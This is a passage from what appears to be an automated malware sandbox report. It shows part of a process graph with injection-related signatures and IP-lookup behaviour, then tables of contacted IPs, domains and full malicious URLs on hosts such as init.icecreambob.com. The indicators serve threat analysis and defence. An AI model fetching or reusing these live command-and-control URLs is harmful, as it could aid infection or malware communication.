52->71         started        75 conhost.exe 52->75         started        77 conhost.exe 55->77         started        149 Changes memory attributes in foreign processes to executable or writable 63->149 151 Writes to foreign memory regions 63->151 153 Allocates memory in foreign processes 63->153 155 3 other signatures 63->155 79 rundll32.exe 63->79         started        process15 dnsIp16 93 222.222.67.208.in-addr.arpa 71->93 95 resolver1.opendns.com 71->95 97 myip.opendns.com 71->97 157 May check the online IP address of the machine 71->157 signatures17
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
194.147.86.221
 init.icecreambob.com Russian Federation
61400 NETRACK-ASRU true

Contacted Domains

Name IP Active
myip.opendns.com 102.129.143.57 true
resolver1.opendns.com 208.67.222.222 true
init.icecreambob.com 194.147.86.221 true
art.microsoftsofymicrosoftsoft.at 194.147.86.221 true
222.222.67.208.in-addr.arpa unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://init.icecreambob.com/zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsbgoHPm/PaJLAxVV/txoYRHBbj9M336C_2FP0F_2/FUuIUTfxn8/_2Fi1Q9Nh_2BYEyGG/g7XOKDVcckgo/6ifLOiy2t7I/1SoBj6Jybx3_2F/lN5De25izDb_2BsQi5Wix/BNFu2ADC3y17pVCQ/oz9_2B52JzEyRR4/O_2FqG0LC5012e1TXc/xR9rFY1G5/iapdd6603NTaeINQSp_2/BwLMzJ7w5SugcYmEG0J/qMt4_2FOPEov9_2Bo1MdfB/1y5TCsV89mnx3/ekW9ulBTE4wo3daXfFHw/KT true
  • Avira URL Cloud: malware
 unknown
http://init.icecreambob.com/FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9ImmPr12_/2Bzh4tdV/KDpXfYGpjXykhg2xrNZQnLl/eQWxO9UJs6/yiNSkrLwUALCzuZwZ/kdGCEU3rIU9m/RGyuFMKeogE/z1UGBluOo2rYqx/Sf1vojdcef_2FoAlYSwrS/eWFw3oSweCgrgQTo/R3sh0ZaR7_2BXrU/KBuwJkO2cZWh9s5jos/PpUP1bcud/5c_2B9g4iz3DCS_2B4Cz/pQllr8YcQ_2FVn4H2Us/rP5gQf2cVzgDcEADA7kdUN/KefPCJRSUE50z/YwbIZJdHqw/X0ic true
  • Avira URL Cloud: malware
 unknown
http://init.icecreambob.com/og7BnMlwe_2BBL3VbbSex/Z2wNM4qLt9ZGOnrN/9je8jFPaDsbcMzh/J_2BWsBwN0E9DyNOrX/d2qP1bGCk/qJX6O5QV7cikPdeCysOT/SVA8NuODHqgxyywc97o/sy0RL7jVfhXgOS_2F71qSG/2FS97AOq0AZ7i/X9_2BsM8/SJH1OhdjW9LhTsNZM3lXLoj/SkVBjHPOLQ/6GYRgOB9uQP3Kv3KV/fG6AntXu_2Fz/nGnOrkp86kX/RqEbx2FTMLsnk_/2FwjN_2B5_2BN0BKA_2FD/vDq8sU2vs2Ajys3z/1dncEwDhZBm_2B_/2BT0IVCl_2Fi1ROltK/Ns3vDVNy1/kniVonoTwHdN/F4BE_2B true
  • Avira URL Cloud: malware
 unknown
http://init.icecreambob.com/WD1GVGFxgZw/vdm2GeJ_2BleeD/xBKgH3gETrFFIsar7DerZ/qXw_2BmqCKfPdDFV/h8dkp6DT7p7lsEb/gtBepZBTsY8u6IZ_2B/slZYk8jOI/KWElWApc2AbPjj3JcqRW/pbQLCPSQWt3ZN3tjPe8/mXL41rn8MBcUk2OkcsuXJx/EoX5HyK9gu6tJ/HdiOJ_2F/vkfbE_2BFoaAHj2fO1r8paT/WkrWga9cjs/R1EobQ_2FVIB2FUG2/gDd0_2B_2Bn1/TZlCNHxakZo/w6E7c784GfHMDV/_2Fz5c89FcKDHFuQdUlIO/O21na4IIxgsQc_2B/zRGRLvdYbxEEQyb/llhWY2ulIai/ojLy true
  • Avira URL Cloud: malware
 unknown
http://art.microsoftsofymicrosoftsoft.at/F8KV2hZoxO/U2sbox634rP29bJ_2/FXULDRGEtFfT/UZYVIFvPXHK/8dhg8UXIv347p9/lAjhFuG3pLkJW9jPts5ig/H4HccXVK4_2Fj3x4/JNX_2FOInLR8Nhr/AvMOGKETT4xKlbvgKV/ywk72W2sF/XRIveNKW0cDr2x9FlGme/9PA3AGNAa4JFJCkP8Ol/kE52dtLr2Gc2GIIsbVvLY7/_2FgegwtK4luv/WlDWKBm_/2BVUH_2FoyHiVnOSkUYW3XN/ZNo_2FlFkO/0PpkXJxUPRqbyltz6/D1_2B17g8RMv/LKZDclZ4G3c/Yy5W17MUWWbx9b/ZWlGh_2BykFLR0SdMWzQw/4cxn7 true
  • Avira URL Cloud: safe
 unknown
http://init.icecreambob.com/2dRjaoZ5ba/_2B9OCZL2JKsW54Zw/b8_2FudlSzim/FebecF2Mr0l/RLhLAUL9EkrBQ6/jcfZJyjU6XRJEy_2F_2Fw/U4DTV9Ne0aXzpB9J/0iupMlpKOkgE91k/O1eWSmo3SiP86KIi_2/Fb913ObwC/qpNQAlO4bBFCqmydHOLy/nNarqOCZZOFGkIl4hzv/0jh_2Fn5oIgCb_2BiKYiQR/_2BU0c0XcTad1/VVgGQIES/_2B4c60XhwvhKtewqx0YhNF/9_2B9c5LC4/AStWPuhmAHWEYDBRQ/AKTTfZkbsU8X/VSsiQHsgzPR/ZrnjJVXfpIalCe/F_2BaXGFB0UzrQMjtIKjY/vg3Zv3Ys/i true
  • Avira URL Cloud: malware
 unknown